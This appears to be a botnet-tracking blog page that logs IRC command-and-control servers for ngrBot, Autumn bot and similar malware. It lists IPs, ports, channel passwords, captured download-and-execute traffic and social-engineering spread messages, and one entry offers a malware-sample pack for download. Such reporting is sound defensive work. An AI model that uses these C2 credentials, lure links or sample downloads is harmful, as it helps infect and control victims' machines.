Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 96.127.179.26 1888 PASS strike PRIVMSG #XP :[d=”http://img102.herosh.com/2011/10/01/306960429.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 NICK n{US|XPa}mwsbbkj USER mwsbbkj 0 0 :mwsbbkj JOIN #asdf strike JOIN #XP JOIN #US hosting infos: http://whois.domaintools.com/96.127.179.26
193.107.16.53(ngrBot hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number 161.132.8.83 80 199.15.234.7 80 193.107.16.53 1863 PASS ngrbot NICK n{US|XPa}metgnjg USER metgnjg 0 0 :metgnjg JOIN #sys ngrbot PRIVMSG #sys :[MSN]: Updated MSN spread interval to “8” PRIVMSG #sys :[MSN]: Updated MSN spread message to “mira 😀 http://j.mp/odJCfo?/53153268/tqyvvs/DSC340353.jpg” PRIVMSG #sys :[DNS]: Blocked 0 domain(s) – Redirected 45 domain(s) hosting infos: http://whois.domaintools.com/193.107.16.53
82.114.94.108(ngrBot hosted in Serbia Kujtesa Net Sh.p.k)
Remote Host Port Number 199.15.234.7 80 62.146.124.74 80 62.146.88.122 80 66.40.52.61 80 74.125.47.157 80 74.125.47.167 80 74.125.47.99 80 74.125.47.113 443 74.125.47.120 443 82.114.94.108 7000 PASS .. PRIVMSG #|n|# :[HTTP]: Updated HTTP spread message to “is this foto u send me lol http://bitly.com/oZVaUH?=www.facebook.com/images/2011 |” PRIVMSG #|n|# :[Visit]: Visited “http://www.risi-preshev.com” NICK n{US|XPa}wiinpps USER wiinpps 0 0 :wiinppsRead more...
110Mb Malware Samples
Included in this package phoenix bot sample,autumn bot,ngrbot et diferent trojans bankers passwd stealers etc have fun Download: http://adf.ly/2yECh
91.121.204.203(ngrBot hosted in France Ovh Systems)
Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 91.121.204.203 7475 PASS secret NICK n{US|XPa}evnyvvc USER evnyvvc 0 0 :evnyvvc PONG :80096D0 JOIN ##n secret PRIVMSG ##n :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) hosting infos: http://whois.domaintools.com/91.121.204.203
irc.smd4free.info(Autumn bot hosted in United Kingdom Ovh Systems)
irc.smd4free.info DNS_TYPE_A 46.105.241.187 46.105.241.187:1338 Nick: [AUT-XP-x86]26275 Username: unreal Joined Channel: #autumn jellybeans exe file: http://adf.ly/2yADD hosting infos: http://whois.domaintools.com/46.105.241.187
salihweb.netirc botnet hosted in United Kingdom Redstation Limited)
Remote Host Port Number 199.15.234.7 80 31.3.224.246 7777 PASS secret 31.3.224.246 3030 PASS secret NICK New{US-XP-x86}4665444 USER 4665444 “” “4665444” :4665444 MODE New{US-XP-x86}4665444 +iMm JOIN #secret secret PONG :irc.priv8net.com hosting infos: http://whois.domaintools.com/31.3.224.246
199.167.193.215(ngrBot hosted in United States Yonkers Webrulon Llc)
Remote Host Port Number 199.15.234.7 80 199.167.193.215 6567 PASS hell16 Clients: I have 453 clients and 0 servers Local users: Current Local Users: 453 Max: 1014 Global users: Current Global Users: 453 Max: 1002 NICK n{US|XPa}hkdmmjt USER hkdmmjt 0 0 :hkdmmjt JOIN #cont ngrBot hosting infos: http://whois.domaintools.com/199.167.193.215
85.31.187.144(irc botnet hosted in Germany Aachen Isppro Internet Kg)
Remote Host Port Number 85.31.187.144 6667 NICK {New}[USA-1244024-XP] USER 3533880 “” “lol” :3533880 JOIN #redhack hosting infos: http://whois.domaintools.com/85.31.187.144
irc.hackt.org(Aryan bot hosted in United States Douglas 123systems Solutions)
irc.hackt.org DNS_TYPE_A 64.31.25.127 64.31.25.127:6667 Nick: [AUT|629128] Username: 9857 Joined Channel: #aryan Private Message to Channel #aryan: “.die” Private Message to Channel #aryan: “haha” Private Message to Channel #aryan: “.remove” Private Message to Channel #aryan: “dat not mine” Private Message to Channel #aryan: “hi” Private Message to Channel #aryan: “get outa hur” Private Message to ChannelRead more...